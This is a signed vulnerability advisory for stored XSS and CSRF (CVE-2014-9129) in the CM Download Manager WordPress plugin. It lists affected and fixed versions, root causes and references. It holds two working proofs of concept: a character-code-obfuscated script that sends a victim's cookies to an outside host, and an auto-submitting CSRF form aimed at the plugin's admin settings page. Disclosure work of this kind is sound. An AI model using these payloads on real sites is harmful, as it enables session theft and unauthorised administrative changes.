CVE-2014-9129: XSS and CSRF in CM Download Manager plugin for WordPress

2014-12-22T00:00:00
ID SECURITYVULNS:DOC:31542
Type securityvulns
Reporter Securityvulns
Modified 2014-12-22T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Product: WordPress plugin cm-download-manager Plugin page: https://wordpress.org/plugins/cm-download-manager/ Vendor: CreativeMindsSolutions http://cminds.com/ Vulnerability Type: CWE-79: Cross-site scripting Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: N/A. Only assigned for CSRF Criticality: Low

Vulnerability details:

CM Download Manager plugin for WordPress contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the /wp-admin/admin.php script does not validate input to the 'addons_title' POST parameter before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

Root cause:

The software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to authenticated users.

Proof-of-concept:

Insert following code to CM Downloads -> Settings -> "Downloads listing title" field with CSRF attack.

<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(foo);</script>


Product: WordPress plugin cm-download-manager Plugin page: https://wordpress.org/plugins/cm-download-manager/ Vendor: CreativeMindsSolutions http://cminds.com/ Vulnerability Type: CWE-352: Cross-Site Request Forgery Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: CVE-2014-9129 Criticality: Low

Vulnerability details:

CM Download Manager plugin for WordPress contains a flaw on the CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not require multiple steps, explicit confirmation, or a unique token when performing sensitive actions. By tricking authenticated user into following a specially crafted link, a context-dependent attacker can perform a CSRF attack causing the victim to insert and execute arbitrary script code.

Root cause:

The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Proof-of-concept:

<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3> <form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"> <table><input type="text" name="addons_title" value="XSS"></table></form> <script type="text/javascript">document.getElementById("f1").submit();</script> </body></html>

Notes:

Other pages and/or parameters are also possibly insecure (not tested). Suggested to do a proper security audit for their software. Vendor did not mention security fix or CVE in ChangeLog even it was discussed several times. References below.

Cross-site scripting: http://cwe.mitre.org/data/definitions/79.html https://scapsync.com/cwe/CWE-79 https://en.wikipedia.org/wiki/Cross-site_scripting

Cross-Site Request Forgery: http://cwe.mitre.org/data/definitions/352.html https://scapsync.com/cwe/CWE-352 https://en.wikipedia.org/wiki/Cross-site_request_forgery


Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/ l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT =bUVi -----END PGP SIGNATURE-----